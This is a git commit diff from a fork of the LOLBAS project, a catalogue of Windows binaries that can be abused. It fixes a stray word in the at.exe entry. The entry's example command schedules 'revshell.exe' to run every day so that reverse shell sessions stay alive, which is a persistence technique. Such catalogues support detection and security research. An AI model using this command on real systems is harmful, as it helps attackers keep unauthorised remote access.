Merge pull request #4 from LOLBAS-Project/master

Remove unnecessary "at" on command (#286)
This commit is contained in:
C-h4ck-0
2023-05-07 09:40:58 +03:00
committed by GitHub

View File

@@ -4,7 +4,7 @@ Description: Schedule periodic tasks
Author: 'Freddie Barr-Smith'
Created: 2019-09-20
Commands:
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
- Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Description: Create a recurring task to execute every day at a specific time.
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
Category: Execute